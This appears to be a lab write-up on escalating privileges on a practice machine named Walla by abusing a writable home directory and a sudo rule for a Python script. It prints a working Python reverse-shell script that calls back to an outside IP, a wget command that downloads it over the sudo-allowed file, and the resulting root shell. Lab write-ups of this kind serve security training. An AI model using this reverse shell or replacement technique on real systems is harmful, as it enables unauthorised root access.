InfoSec LAB

Walla_Privilege_Escalation

Created: 2 min read

Misconfigured Home Directory Ownership and Sudo Permissions

The security vulnerability arises from the fact that the www-data user has sudo privileges to execute a specific Python script located in the home directory of the walter user. The core issue stems from the ownership of Walter’s home directory. Rather than being owned by walter, it is instead owned by the current user; www-data

This misconfiguration effectively grants the www-data account full control over the home directory of the walter user, including the ability to modify critical files such as the .ssh directory. This allows the www-data account to impersonate the walter user by overwriting SSH-related files.

However, the more significant exploitation path lies in modifying the Python script that the www-data account is permitted to run with sudo. By altering this script to execute arbitrary commands, an attacker can leverage these sudo privileges to execute the script under the root account’s security context. This ultimately results in privilege escalation, granting full system control.

www-data@walla:/$ mv /home/walter/wifi_reset.py /home/walter/wifi_reset.py.bak
www-data@walla:/$ ll /home/walter
total 28K
4.0K drwxr-xr-x 2 www-data www-data 4.0K Mar 27 13:04 .
4.0K -rw------- 1 www-data walter     33 Mar 27 12:55 local.txt
4.0K drwxr-xr-x 6 root     root     4.0K Sep 17  2020 ..
4.0K -rw-r--r-- 1 root     root      251 Sep 17  2020 wifi_reset.py.bak
4.0K -rw-r--r-- 1 walter   walter    220 Apr 18  2019 .bash_logout
4.0K -rw-r--r-- 1 walter   walter   3.5K Apr 18  2019 .bashrc
4.0K -rw-r--r-- 1 walter   walter    807 Apr 18  2019 .profile

First, I will rename the original wifi_reset.py file

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/walla]
└─$ cat wifi_reset.py
#!/usr/bin/env python3
 
import os,pty,socket,subprocess
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.45.218",1234))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
pty.spawn("bash")

Then I will create a malicious wifi_reset.py file

www-data@walla:/$ wget -q http://192.168.45.218/wifi_reset.py -O /home/walter/wifi_reset.py

Delivery

www-data@walla:/$ sudo -u root /usr/bin/python /home/walter/wifi_reset.py

Executing the sudo-privileged command

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/walla]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.179.97] 48366
root@walla:/# whoami
whoami
root
root@walla:/# hostname
hostname
walla
root@walla:/# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:a0:23 brd ff:ff:ff:ff:ff:ff
    inet 192.168.179.97/24 brd 192.168.179.255 scope global ens192
       valid_lft forever preferred_lft forever

System level compromise

Interactive Graph View

Backlinks